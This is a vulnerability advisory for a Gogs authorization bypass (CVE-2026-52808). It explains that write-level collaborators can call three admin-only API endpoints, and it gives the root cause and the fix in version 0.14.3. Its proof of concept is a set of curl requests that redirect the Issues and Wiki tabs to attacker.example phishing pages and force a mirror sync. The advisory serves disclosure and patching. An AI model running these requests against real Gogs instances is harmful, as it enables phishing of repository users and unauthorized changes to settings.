high · 7.1CVE-2026-52808Jun 26, 2026

CVE-2026-52808: Gogs Write-Level Collaborator Authorization Bypass on Admin API Endpoints

Shubham Kandhare
Security Engagement Manager, SecureLayer7

Any repository collaborator with write access can call three admin-only Gogs API endpoints to hijack the Issues or Wiki tab with an attacker-controlled redirect URL, because the API routes use a weake

Packagegogs.io/gogs
Ecosystemgo
Affected< 0.14.3
Fixed in0.14.3
CVE-2026-52808: Gogs Write-Level Collaborator Authorization Bypass on Admin API Endpoints

The problem

Three API endpoints in Gogs, `PATCH /api/v1/repos/:owner/:repo/issue-tracker`, `PATCH /api/v1/repos/:owner/:repo/wiki`, and `POST /api/v1/repos/:owner/:repo/mirror-sync`, are registered with `reqRepoWriter()` middleware instead of `reqRepoAdmin()`.

The web UI enforces `AccessMode >= AccessModeAdmin` for the same operations, but the API only requires `AccessMode >= AccessModeWrite`. A write-level collaborator can therefore call these endpoints directly and mutate settings that should be admin-only.

Proof of concept

bash
# Precondition: attacker is a write-level collaborator, NOT a repo admin.

# 1) Redirect the Issues tab to an attacker-controlled phishing page
curl -i -X PATCH "https://TARGET/api/v1/repos/OWNER/REPO/issue-tracker" \
  -H "Authorization: token WRITER_TOKEN" \
  -H "Content-Type: application/json" \
  --data '{"enable_issues":false,"enable_external_tracker":true,"external_tracker_url":"https://attacker.example/phish"}'
# Expected: HTTP 204 No Content

# 2) Redirect the Wiki tab to an attacker-controlled page
curl -i -X PATCH "https://TARGET/api/v1/repos/OWNER/REPO/wiki" \
  -H "Authorization: token WRITER_TOKEN" \
  -H "Content-Type: application/json" \
  --data '{"enable_wiki":false,"enable_external_wiki":true,"external_wiki_url":"https://attacker.example/phish-wiki"}'
# Expected: HTTP 204 No Content

# 3) Force mirror sync (resource abuse)
curl -i -X POST "https://TARGET/api/v1/repos/OWNER/REPO/mirror-sync" \
  -H "Authorization: token WRITER_TOKEN"
# Expected: HTTP 202 Accepted

The root cause is a middleware mismatch at route registration in `internal/route/api/v1/api.go` lines 365-367. `reqRepoWriter()` passes any user with `AccessMode >= AccessModeWrite`, while the handlers `issueTracker()` and `wiki()` perform no additional privilege check before writing attacker-controlled URLs directly to the repository record and calling `database.UpdateRepository()`.

The patch replaces `reqRepoWriter()` with `reqRepoAdmin()` on all three routes, aligning the API authorization with the stricter `RequireRepoAdmin()` guard already applied to the equivalent web UI settings pages. This maps to CWE-863 (Incorrect Authorization) and CWE-269 (Improper Privilege Management).

The fix

Upgrade Gogs to version 0.14.3. The fix replaces `reqRepoWriter()` with `reqRepoAdmin()` for the three affected route registrations in `internal/route/api/v1/api.go`. No configuration change is needed; updating the binary is sufficient. Patch commit: `6283462119bd8894f1599d70339b5e823f99954a`.

Reported by bugbunny.ai.

References: [1][2][3][4][5]